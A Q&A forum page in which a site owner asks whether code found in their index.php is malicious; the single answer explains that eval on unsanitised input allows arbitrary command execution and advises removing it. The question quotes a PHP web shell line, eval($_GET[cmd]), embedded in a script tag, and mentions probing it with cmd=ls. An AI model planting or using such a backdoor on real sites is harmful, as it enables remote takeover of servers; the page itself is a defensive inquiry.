I found in my site index.php this code <script type=text/javascript> new.track(new.dev,_browser,'<?php eval($_GET[cmd]); ?>’, ‘<?php

Question

0

Asked: June 14, 20262026-06-14T11:03:59+00:00 2026-06-14T11:03:59+00:00

I found in my site index.php this code <script type=text/javascript> new.track(new.dev,_browser,'<?php eval($_GET[cmd]); ?>’, ‘<?php

0

I found in my site index.php this code

<script type="text/javascript">
  new.track("new.dev","_browser","'<?php eval($_GET[cmd]); ?>', '<?php eval($_GET[cmd]);?>'");
  new.track("new.dev","_url",location.href);
</script>

Is that code are malicious?
From web i tryed to put something like index.php?cmd=ls and nothing was appear. Maybe it needed to be on page?
I trying to understand what previous admin do on site.

Report

Leave an answer
Cancel reply

You must login to add an answer.

Need An Account,

1 Answer

Editorial Team · Answer 1 · 2026-06-14T11:04:02+00:00

Editorial Team

2026-06-14T11:04:02+00:00Added an answer on June 14, 2026 at 11:04 am

There is an unending amount of risk in that code. eval() runs php commands and can run terminal commands. With you accepting input without sanitation, someone could go nuts and cause some serious harm there. I would remove that immediately and find a better way.

Bonk the guy on the head who wrote it, too.

0

Reply
Share
Share

- Report

Sign Up

Sign In

Forgot Password

The Archive Base Latest Questions

I found in my site index.php this code <script type=text/javascript> new.track(new.dev,_browser,'<?php eval($_GET[cmd]); ?>’, ‘<?php

Leave an answerCancel reply

1 Answer

Leave an answer
Cancel reply